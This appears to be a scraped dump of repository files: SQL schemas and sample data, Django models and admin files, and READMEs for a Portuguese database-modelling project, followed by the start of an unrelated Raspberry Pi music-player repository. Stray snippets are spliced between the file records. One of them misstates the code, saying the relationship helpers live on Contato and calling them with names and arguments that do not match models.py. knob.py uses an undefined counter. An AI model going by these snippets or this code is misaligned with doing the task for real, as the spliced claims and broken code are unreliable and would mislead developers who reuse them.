(idCategoria, produto, preco) VALUES (1, 'Toalha de mesa', 45);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (2, 'Geladeira', 1200);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (2, 'Fogao', 600);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (3, 'Notebook', 1200);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (3, 'Tablet', 900);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (3, 'Ultrabook', 2100);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (4, 'Sofa', 1500);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (4, 'Cama', 800);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (4, 'Cadeira', 400);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (4, 'Mesa', 1450);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (5, 'Calca', 59.99);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (5, 'Camisa', 44.99);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (5, 'Blusa', 80.90);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (5, 'Short', 40.50);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (5, 'Meia', 15.25);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (6, 'CD Player', 180);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (6, 'Microsystem', 1350.75);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (7, 'TV', 1459.99);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (7, 'Blue Ray', 724.99);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (7, 'Home Teather', 1879.99);\n\n-- Populando pedidos\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-01', 1);\nINSERT 
INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-01', Null);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-02', 1);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-02', 2);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-03', Null);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-03', 3);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-04', 3);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-05', Null);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-07', Null);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-08', 4);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-08', 4);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-09', Null);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-09', 5);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-10', 6);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-10', 6);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-10', Null);\n\n\n-- Populando detPedidos\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (1, 1, 16);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (1,2, 20);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (1,3, 12);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (1,3, 11);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (2,2, 1);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (2,1, 5);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (2,5, 3);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (3,10, 2);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (3,20, 8);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (3,15, 9);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (3,15, 12);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (3,12, 20);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (4,13, 22);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (5,14, 17);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (5,7, 19);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (6,7, 4);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (6,7, 6);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (7,8, 3);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (7,9, 5);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (7,10, 2);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (8,12, 1);\n\n-- Mostrando o nome dos clientes que fizeram um pedido\nSELECT DISTINCT nome\nFROM clientes C\nINNER JOIN pedidos P\nON C.idCliente = P.idCliente;\n"
},
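A natural follow-up query on this schema is the total value per order; shown here through a DB-API cursor so the SQL stays visible (connection setup is omitted; any MySQL driver with a standard cursor works):

ORDER_TOTALS_SQL = """
SELECT p.idPedido, SUM(d.quantidade * pr.preco) AS total
FROM pedidos p
INNER JOIN detPedidos d ON d.idPedido = p.idPedido
INNER JOIN produtos pr ON pr.idProduto = d.idProduto
GROUP BY p.idPedido
ORDER BY total DESC;
"""

def order_totals(conn):
    # returns [(idPedido, total), ...] ordered by total
    cur = conn.cursor()
    cur.execute(ORDER_TOTALS_SQL)
    return cur.fetchall()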
{
"alpha_fraction": 0.7906976938247681,
"alphanum_fraction": 0.7965116500854492,
"avg_line_length": 27.83333396911621,
"blob_id": "40d898e97a5ca96dac827c2a10baf912011ab457",
"content_id": "2ab53c90c05b0cb5fec26e33ff1592c3c3722b7a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 6,
"path": "/pedido/README.md",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "##PEDIDO\n\nExemplo de pedido de compras para teste dos comandos sql.\n\nAgora o pedido faz parte de um projeto django.\nO projeto será feito com sqlite3 para mais simplicidade."
},
{
"alpha_fraction": 0.7422680258750916,
"alphanum_fraction": 0.7437407970428467,
"avg_line_length": 20.21875,
"blob_id": "3e05145f4d4c745da636e3f76fc8b4aaa18649d9",
"content_id": "da8bd1f87b1caf6895f3562f1332f2eb2d9aaaae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 679,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 32,
"path": "/agenda/admin.py",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.contrib import admin\nfrom agenda.models import *\n\n\nclass RelacionamentoInline(admin.StackedInline):\n model = Relacionamento\n fk_name = 'contato'\n\n\nclass FoneInline(admin.TabularInline):\n model = Fone\n\n\nclass EnderecoInline(admin.TabularInline):\n model = Endereco\n\n\nclass ContatoTagInline(admin.TabularInline):\n model = ContatoTag\n fk_name = 'contato'\n\n\nclass ContatoAdmin(admin.ModelAdmin):\n inlines = [RelacionamentoInline, FoneInline,\n EnderecoInline, ContatoTagInline]\n\n\nadmin.site.register(Contato, ContatoAdmin)\nadmin.site.register(Endereco)\nadmin.site.register(Relacionamento)\nadmin.site.register(Tag)\n"
},
{
"alpha_fraction": 0.6049270033836365,
"alphanum_fraction": 0.6158758997917175,
"avg_line_length": 28.823129653930664,
"blob_id": "5fdc15f0751d4b5d3c8b9f0747565d9eedf16bb2",
"content_id": "024e970802f81127e03fb519c84aff6b2d9c1e7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4387,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 147,
"path": "/agenda/models.py",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.db import models\n\nCONTATO_TRATAMENTO = (\n ('a', 'Arq.'),\n ('aa', 'Arqa.'),\n ('d', 'Dona'),\n ('dr', 'Dr.'),\n ('dra', 'Dra.'),\n ('e', 'Eng.'),\n ('p', 'Prof.'),\n ('pa', 'Profa.'),\n ('sr', 'Sr.'),\n ('sra', 'Sra.'),\n ('srta', 'Srta.'),\n)\n\nTIPO_CONTATO = (\n ('e', 'empresa'),\n ('p', 'pessoa'),\n ('c', 'colaborador'),\n ('f', u'funcionário'),\n)\n\n\nclass Contato(models.Model):\n confidencial = models.BooleanField(default=True)\n tratamento = models.CharField(\n max_length=4, choices=CONTATO_TRATAMENTO, blank=True)\n nome = models.CharField(max_length=50)\n sobrenome = models.CharField(max_length=50, blank=True)\n nome_fantasia = models.CharField(max_length=50, blank=True)\n razao_social = models.CharField(max_length=50, blank=True)\n tipo_contato = models.CharField(max_length=1, choices=TIPO_CONTATO)\n cargo = models.CharField(max_length=50, blank=True)\n email = models.EmailField()\n cnpj = models.CharField(max_length=13, blank=True)\n ie = models.CharField(max_length=15, blank=True)\n cpf = models.CharField(max_length=11, blank=True)\n rg = models.CharField(max_length=10, blank=True)\n criado_em = models.DateTimeField(auto_now_add=True, auto_now=False)\n modificado_em = models.DateTimeField(auto_now_add=False, auto_now=True)\n relationships = models.ManyToManyField(\n 'self', through='Relacionamento', symmetrical=False, related_name='related_to+')\n\n class Meta:\n ordering = ['criado_em']\n verbose_name = (u'Contato')\n verbose_name_plural = (u'Contatos')\n\n def __unicode__(self):\n return self.nome + \" \" + self.sobrenome\n\n\nclass Relacionamento(models.Model):\n contato = models.ForeignKey('Contato', related_name='contato_de')\n relaciona_com = models.ForeignKey('Contato', related_name='relaciona_com')\n\n class Meta:\n verbose_name = (u'Relacionamento')\n verbose_name_plural = (u'Relacionamentos')\n\n def __unicode__(self):\n return u'%s -> %s' % (self.contato.nome, self.relaciona_com.nome)\n\n def add_relationship(self, person, status, symm=True):\n relationship, created = Relacionamento.objects.get_or_create(\n contato=self,\n relaciona_com=person,\n status=status)\n if symm:\n person.add_relationship(self, status, False)\n return relationship\n\n def remove_relationship(self, person, status, symm=True):\n Relacionamento.objects.filter(\n contato=self,\n relaciona_com=person,\n status=status).delete()\n if symm:\n person.remove_relationship(self, status, False)\n\n def get_relationship(self, status):\n return self.relationships.filter(\n to_people__contato=self)\n\n\nclass ContatoTag(models.Model):\n contato = models.ForeignKey('Contato')\n tag = models.ForeignKey('Tag')\n\n\nclass Tag(models.Model):\n tag = models.CharField(max_length=100)\n\n class Meta:\n verbose_name = (u'tag')\n verbose_name_plural = (u'tags')\n\n def __unicode__(self):\n return self.tag\n\nTIPO_ENDERECO = (\n ('i', 'indefinido'),\n ('c', 'comercial'),\n ('r', 'residencial'),\n ('o', 'outros'),\n)\n\n\nclass Endereco(models.Model):\n contato = models.ForeignKey('Contato')\n tipo_endereco = models.CharField(max_length=1, choices=TIPO_ENDERECO)\n logradouro = models.CharField(max_length=200)\n complemento = models.CharField(max_length=100, blank=True)\n bairro = models.CharField(max_length=100, blank=True)\n cidade = models.CharField(max_length=100, blank=True)\n uf = models.CharField(max_length=100, blank=True)\n pais = models.CharField(max_length=100, blank=True)\n cep = models.CharField(max_length=50, blank=True)\n\n class Meta:\n verbose_name = 
(u'endereço')\n verbose_name_plural = (u'endereços')\n\n def __unicode__(self):\n return self.logradouro\n\nTIPO_FONE = (\n ('pri', 'principal'),\n ('com', 'comercial'),\n ('res', 'residencial'),\n ('cel', 'celular'),\n ('cl', 'Claro'),\n ('oi', 'Oi'),\n ('t', 'Tim'),\n ('v', 'Vivo'),\n ('n', 'Nextel'),\n ('fax', 'fax'),\n ('o', 'outros'),\n)\n\n\nclass Fone(models.Model):\n contato = models.ForeignKey('Contato')\n fone = models.CharField(max_length=50)\n tipo_fone = models.CharField(max_length=3, choices=TIPO_FONE)\n"
},
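With the relationship helpers living on Contato as above, creating a symmetric link is a sketch like the following (Django shell; only the required fields are filled in, and the names are invented):

from agenda.models import Contato

a = Contato.objects.create(nome='Ana', tipo_contato='p', email='ana@example.com')
b = Contato.objects.create(nome='Beto', tipo_contato='p', email='beto@example.com')

a.add_relationship(b)                # also creates the mirror row b -> a
print(list(a.get_relationships()))  # the contatos a is linked to
a.remove_relationship(b)             # deletes both directions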
{
"alpha_fraction": 0.7319587469100952,
"alphanum_fraction": 0.7319587469100952,
"avg_line_length": 23.375,
"blob_id": "51c1a66cfa05b84d8e0169fd8a2e5ff28fe8dc8c",
"content_id": "6e6f59f1e337ecc241aff6ccf20e6baf43b7c14f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 196,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 8,
"path": "/README.md",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "banco_de_dados\n==============\n\nModelagem de dados e testes em SGBD.\n\n# Objetivo\n\nO objetivo deste projeto é fazer algumas modelagens de banco de dados, além de experimentar e testar alguns SGBD."
},
{
"alpha_fraction": 0.6316685676574707,
"alphanum_fraction": 0.6594778895378113,
"avg_line_length": 34.2400016784668,
"blob_id": "92d8fd188f09e7ddb4e059414edda7347eeade69",
"content_id": "678421d11751a8a86c3cff5c736ed477fc132413",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1762,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 50,
"path": "/agenda/agenda.sql",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "CREATE TABLE \"agenda_contato\" (\n \"id\" integer NOT NULL PRIMARY KEY,\n \"confidencial\" boolean NOT NULL,\n \"tratamento\" varchar(4) NOT NULL,\n \"nome\" varchar(50) NOT NULL,\n \"sobrenome\" varchar(50) NOT NULL,\n \"nome_fantasia\" varchar(50) NOT NULL,\n \"razao_social\" varchar(50) NOT NULL,\n \"tipo_contato\" varchar(1) NOT NULL,\n \"cargo\" varchar(50) NOT NULL,\n \"email\" varchar(75) NOT NULL,\n \"cnpj\" varchar(13) NOT NULL,\n \"ie\" varchar(15) NOT NULL,\n \"cpf\" varchar(11) NOT NULL,\n \"rg\" varchar(10) NOT NULL,\n \"criado_em\" datetime NOT NULL,\n \"modificado_em\" datetime NOT NULL\n);\nCREATE TABLE \"agenda_relacionamento\" (\n \"id\" integer NOT NULL PRIMARY KEY,\n \"contato_id\" integer NOT NULL REFERENCES \"agenda_contato\" (\"id\"),\n \"relaciona_com_id\" integer NOT NULL REFERENCES \"agenda_contato\" (\"id\")\n);\nCREATE TABLE \"agenda_contatotag\" (\n \"id\" integer NOT NULL PRIMARY KEY,\n \"contato_id\" integer NOT NULL REFERENCES \"agenda_contato\" (\"id\"),\n \"tag_id\" integer NOT NULL\n);\nCREATE TABLE \"agenda_tag\" (\n \"id\" integer NOT NULL PRIMARY KEY,\n \"tag\" varchar(100) NOT NULL\n);\nCREATE TABLE \"agenda_endereco\" (\n \"id\" integer NOT NULL PRIMARY KEY,\n \"contato_id\" integer NOT NULL REFERENCES \"agenda_contato\" (\"id\"),\n \"tipo_endereco\" varchar(1) NOT NULL,\n \"logradouro\" varchar(200) NOT NULL,\n \"complemento\" varchar(100) NOT NULL,\n \"bairro\" varchar(100) NOT NULL,\n \"cidade\" varchar(100) NOT NULL,\n \"uf\" varchar(100) NOT NULL,\n \"pais\" varchar(100) NOT NULL,\n \"cep\" varchar(50) NOT NULL\n);\nCREATE TABLE \"agenda_fone\" (\n \"id\" integer NOT NULL PRIMARY KEY,\n \"contato_id\" integer NOT NULL REFERENCES \"agenda_contato\" (\"id\"),\n \"fone\" varchar(50) NOT NULL,\n \"tipo_fone\" varchar(3) NOT NULL\n);\n"
},
{
"alpha_fraction": 0.7124999761581421,
"alphanum_fraction": 0.7291666865348816,
"avg_line_length": 31.0222225189209,
"blob_id": "828b3b5708e21f830f0cef1722643bffff40f057",
"content_id": "740120b52d36765f7a4ce2e24c87871b5d41810d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1452,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 45,
"path": "/agenda/README.md",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "Agenda\n======\n\n# Objetivo\n\nModelar uma agenda de contatos onde um contato possa se relacionar com outras pessoas, semelhante aos relacionamentos do Facebook e Google+.\n\nAlém disso o contato pode possuir vários endereços, telefones e tags. As tags servem para melhorar a identificação de cada contato.\n\n# Itens\n\n**mer.tex** é a modelagem conceitual (coloquei apenas as entidades). Para fazer este documento eu usei o [LaTeX][0] junto com o pacote [tikz-er2][2].\n\nPara compilar o documento use o comando\n\n\t$ latexmk -pdf mer.tex && latexmk -c\n\nPara converter o **pdf** em **jpg** use o [Imagemagick][3].\n\n\t$ convert -density 300 mer.pdf mer.jpg\n\n\n\n**modelagem.png** mostra as tabelas feitas no *Workbench*.\n\n\n\n**agenda_django.png** são as tabelas feitas no *Django*.\n\n\n\n**agenda_mysql_workbench.sql** é o schema exportado do *Workbench*.\n\n**agenda.sql** é o schema exportado do sqlite3.\n\n**models.py** é a *receita* de como fazer o modelo no *Django*.\n\n**admin.py** mostra em especial o uso do *TabularInline*.\n\n**Todo**: Leia [Como criar um site com formulário e lista em 30 minutos][1] e tente você mesmo recriar o modelo no Django.\n\n[0]: http://latexbr.blogspot.com.br/\n[1]: http://pythonclub.com.br/criar-site-com-form-lista-30-min.html\n[2]: https://bitbucket.org/pavel_calado/tikz-er2/wiki/Home\n[3]: http://grandeportal.blogspot.com.br/2012/06/editando-imagens-no-imagemagick.html"
},
{
"alpha_fraction": 0.7785235047340393,
"alphanum_fraction": 0.7852349281311035,
"avg_line_length": 29,
"blob_id": "44e9f1996a0782660dcffc515f5b5c91bbaeb1b7",
"content_id": "d6f4b1bde0f6a61b9695f835d3df606b4b741d0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 149,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 5,
"path": "/pedido/pedido_project/pedido/admin.py",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\nfrom pedido.models import *\nfrom django.contrib import admin\n\nadmin.site.register((Cliente, Produto, Categoria, Pedido, DetPedido))"
},
{
"alpha_fraction": 0.5481410622596741,
"alphanum_fraction": 0.5633937120437622,
"avg_line_length": 30.787878036499023,
"blob_id": "65cb947c552dab0691f398e2709991b2ebafc550",
"content_id": "fb94691224e3e5bc29f027d0e28edc55e8ce0e99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 4196,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 132,
"path": "/agenda/agenda_mysql_workbench.sql",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;\nSET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;\nSET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';\n\nCREATE SCHEMA IF NOT EXISTS `agenda` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;\nUSE `agenda` ;\n\n-- -----------------------------------------------------\n-- Table `agenda`.`Contato`\n-- -----------------------------------------------------\nCREATE TABLE IF NOT EXISTS `agenda`.`Contato` (\n `id` INT NOT NULL,\n `confidencial` TINYINT(1) NULL,\n `tratamento` VARCHAR(100) NULL,\n `nome` VARCHAR(100) NULL,\n `sobrenome` VARCHAR(100) NULL,\n `nome_fantasia` VARCHAR(100) NULL,\n `razao_social` VARCHAR(100) NULL,\n `tipo_contato` VARCHAR(5) NULL,\n `cargo` VARCHAR(45) NULL,\n `email` VARCHAR(45) NULL,\n `cnpj` VARCHAR(13) NULL,\n `ie` VARCHAR(15) NULL,\n `cpf` VARCHAR(11) NULL,\n `rg` VARCHAR(15) NULL,\n `criado_em` DATETIME NULL,\n `modificado_em` DATETIME NULL,\n PRIMARY KEY (`id`))\nENGINE = InnoDB;\n\n\n-- -----------------------------------------------------\n-- Table `agenda`.`Relacionamento`\n-- -----------------------------------------------------\nCREATE TABLE IF NOT EXISTS `agenda`.`Relacionamento` (\n `id` INT NOT NULL,\n `contato_id` INT NOT NULL,\n `relaciona_com_id` INT NOT NULL,\n PRIMARY KEY (`id`),\n INDEX `fk_Relacionamento_Contato_idx` (`contato_id` ASC),\n INDEX `fk_Relacionamento_Contato1_idx` (`relaciona_com_id` ASC),\n CONSTRAINT `fk_Relacionamento_Contato`\n FOREIGN KEY (`contato_id`)\n REFERENCES `agenda`.`Contato` (`id`)\n ON DELETE NO ACTION\n ON UPDATE NO ACTION,\n CONSTRAINT `fk_Relacionamento_Contato1`\n FOREIGN KEY (`relaciona_com_id`)\n REFERENCES `agenda`.`Contato` (`id`)\n ON DELETE NO ACTION\n ON UPDATE NO ACTION)\nENGINE = InnoDB;\n\n\n-- -----------------------------------------------------\n-- Table `agenda`.`Endereco`\n-- -----------------------------------------------------\nCREATE TABLE IF NOT EXISTS `agenda`.`Endereco` (\n `id` INT NOT NULL,\n `contato_id` INT NOT NULL,\n `tipo_endereco` VARCHAR(1) NULL,\n `logradouro` VARCHAR(45) NULL,\n `complemento` VARCHAR(45) NULL,\n `bairro` VARCHAR(45) NULL,\n `cidade` VARCHAR(45) NULL,\n `estado` VARCHAR(45) NULL,\n `pais` VARCHAR(45) NULL,\n `cep` VARCHAR(45) NULL,\n PRIMARY KEY (`id`),\n INDEX `fk_Endereco_Contato1_idx` (`contato_id` ASC),\n CONSTRAINT `fk_Endereco_Contato1`\n FOREIGN KEY (`contato_id`)\n REFERENCES `agenda`.`Contato` (`id`)\n ON DELETE NO ACTION\n ON UPDATE NO ACTION)\nENGINE = InnoDB;\n\n\n-- -----------------------------------------------------\n-- Table `agenda`.`Fone`\n-- -----------------------------------------------------\nCREATE TABLE IF NOT EXISTS `agenda`.`Fone` (\n `id` INT NOT NULL,\n `contato_id` INT NOT NULL,\n `fone` VARCHAR(45) NULL,\n `tipo_fone` VARCHAR(45) NULL,\n PRIMARY KEY (`id`),\n INDEX `fk_Fone_Contato1_idx` (`contato_id` ASC),\n CONSTRAINT `fk_Fone_Contato1`\n FOREIGN KEY (`contato_id`)\n REFERENCES `agenda`.`Contato` (`id`)\n ON DELETE NO ACTION\n ON UPDATE NO ACTION)\nENGINE = InnoDB;\n\n\n-- -----------------------------------------------------\n-- Table `agenda`.`Tag`\n-- -----------------------------------------------------\nCREATE TABLE IF NOT EXISTS `agenda`.`Tag` (\n `id` INT NOT NULL,\n `tag` VARCHAR(45) NULL,\n PRIMARY KEY (`id`))\nENGINE = InnoDB;\n\n\n-- -----------------------------------------------------\n-- Table `agenda`.`Contato_Tag`\n-- -----------------------------------------------------\nCREATE TABLE IF NOT EXISTS 
`agenda`.`Contato_Tag` (\n `id` INT NOT NULL,\n `contato_id` INT NOT NULL,\n `tag_id` INT NOT NULL,\n PRIMARY KEY (`id`),\n INDEX `fk_Contato_Tag_Contato1_idx` (`contato_id` ASC),\n INDEX `fk_Contato_Tag_Tag1_idx` (`tag_id` ASC),\n CONSTRAINT `fk_Contato_Tag_Contato1`\n FOREIGN KEY (`contato_id`)\n REFERENCES `agenda`.`Contato` (`id`)\n ON DELETE NO ACTION\n ON UPDATE NO ACTION,\n CONSTRAINT `fk_Contato_Tag_Tag1`\n FOREIGN KEY (`tag_id`)\n REFERENCES `agenda`.`Tag` (`id`)\n ON DELETE NO ACTION\n ON UPDATE NO ACTION)\nENGINE = InnoDB;\n\n\nSET SQL_MODE=@OLD_SQL_MODE;\nSET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;\nSET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;\n"
}
] | 10 |
deenski/myRuneRadio | https://github.com/deenski/myRuneRadio | 385b2fd0ed71b5561f56eb33000e5b464aced691 | 7ac97d910c6613e672fe35530f52e4927b4649ee | 649d01158554f0bc61356cc8dc10dbed2cf494bd | refs/heads/master | 2021-01-17T19:23:51.100410 | 2016-08-07T02:53:00 | 2016-08-07T02:53:00 | 65,020,567 | 0 | 0 | null | 2016-08-05T13:28:42 | 2016-08-05T13:56:02 | 2016-08-05T14:11:21 | Python | [
{
"alpha_fraction": 0.6071121096611023,
"alphanum_fraction": 0.6208775639533997,
"avg_line_length": 29.990825653076172,
"blob_id": "ea18c27a653065b600a7bb866210e7154f41b025",
"content_id": "180b8129492838e0f09a3296cc96381de4ba1da1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3487,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 109,
"path": "/knob.py",
"repo_name": "deenski/myRuneRadio",
"src_encoding": "UTF-8",
"text": "\"\"\"Save this file as /var/www/command/knob.py\"\"\"\r\n\r\n#KY040 Python Class\r\n#base file from Martin O'Hanlon\r\n#stuffaboutcode.com\r\n\r\n\"\"\"Seriously, Martin's site is one of the best resources for RPi, python, coding help\r\nThank you Martin for providing the base of this file. My project wouldn't have\r\nworked, and I would be lost without this gem.\"\"\"\r\n\r\n#Increase Volume, Decrease Volume, Play, Pause, and Skip Track \r\n# functionality as well as doc strings by Jakob Vendegna\r\n\r\n\"\"\"This file is intended to run as a service on a Raspberry Pi using an mcp player like\r\nruneaudio (http://www.runeaudio.com/). The functionality of this file will allow a headless\r\nplayer, as should be with a RPi.\"\"\"\r\n\r\nimport RPi.GPIO as GPIO\r\nfrom time import sleep\r\nimport subprocess\r\n\r\n#start playing on boot\r\nsubprocess.call(['mpc','play'])\r\n\r\n\r\nclass KY040:\r\n \"\"\"in martin's file the clockwise and anti clockwise variables are opposite with CLOCKWISE = 0, etc...\r\n however this gave my ky040 the opposite functionality that I wanted. I am sure the variables are arbitrary,\r\n but I thought I would change it for the sake of my personal sanity. do what works for your project.\"\"\"\r\n CLOCKWISE = 1\r\n ANTICLOCKWISE = 0\r\n #button_counter tracks the number of times the switch on the ky040 has been pressed\r\n button_counter = 0\r\n \r\n def __init__(self, clockPin, dataPin, switchPin, rotaryCallback, switchCallback):\r\n #persist values\r\n self.clockPin = clockPin\r\n self.dataPin = dataPin\r\n self.switchPin = switchPin\r\n self.rotaryCallback = rotaryCallback\r\n self.switchCallback = switchCallback\r\n\r\n\r\n #setup pins\r\n GPIO.setup(clockPin, GPIO.IN)\r\n GPIO.setup(dataPin, GPIO.IN)\r\n GPIO.setup(switchPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\r\n \r\n\r\n def start(self):\r\n GPIO.add_event_detect(self.clockPin, GPIO.FALLING, callback=self._clockCallback, bouncetime=250)\r\n GPIO.add_event_detect(self.switchPin, GPIO.FALLING, callback=self._switchCallback, bouncetime=300)\r\n\r\n def stop(self):\r\n GPIO.remove_event_detect(self.clockPin)\r\n GPIO.remove_event_detect(self.switchPin)\r\n # when knob turned:\r\n def _clockCallback(self, pin):\r\n if GPIO.input(self.clockPin) == 0:\r\n data = GPIO.input(self.dataPin)\r\n if data == 1:\r\n self.rotaryCallback(self.ANTICLOCKWISE)\r\n subprocess.call(['mpc', 'volume', '-2'])\r\n else:\r\n self.rotaryCallback(self.CLOCKWISE)\r\n subprocess.call(['mpc', 'volume', '+2'])\r\n\r\n # when buttton pressed\r\n def _switchCallback(self, pin):\r\n if GPIO.input(self.switchPin) == 0:\r\n self.switchCallback()\r\n subprocess.call(['mpc','toggle'])\r\n track_Counter += 1\r\n print str(track_Counter)\r\n\r\n if track_Counter == 3:\r\n subprocess.call(['mpc','next'])\r\n track_Counter = 0\r\n\r\n\r\n\r\n#test\r\nif __name__ == \"__main__\":\r\n \r\n #set your pins here\r\n CLOCKPIN = 5\r\n DATAPIN = 6\r\n SWITCHPIN = 13\r\n\r\n def rotaryChange(direction):\r\n print \"turned - \" + str(direction)\r\n\r\n\r\n def switchPressed():\r\n print \"button pressed\"\r\n\r\n\r\n GPIO.setmode(GPIO.BCM)\r\n \r\n ky040 = KY040(CLOCKPIN, DATAPIN, SWITCHPIN, rotaryChange, switchPressed)\r\n\r\n ky040.start()\r\n\r\n try:\r\n while True:\r\n sleep(0.1)\r\n finally:\r\n ky040.stop()\r\n GPIO.cleanup()\r\n"
},
{
"alpha_fraction": 0.7425431609153748,
"alphanum_fraction": 0.7582417726516724,
"avg_line_length": 32.52631759643555,
"blob_id": "58619350ee8582ef2be88ca39d2112bc40411337",
"content_id": "4210990f4d3b87596348771ce98ccb5690050b1a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1274,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 38,
"path": "/README.md",
"repo_name": "deenski/myRuneRadio",
"src_encoding": "UTF-8",
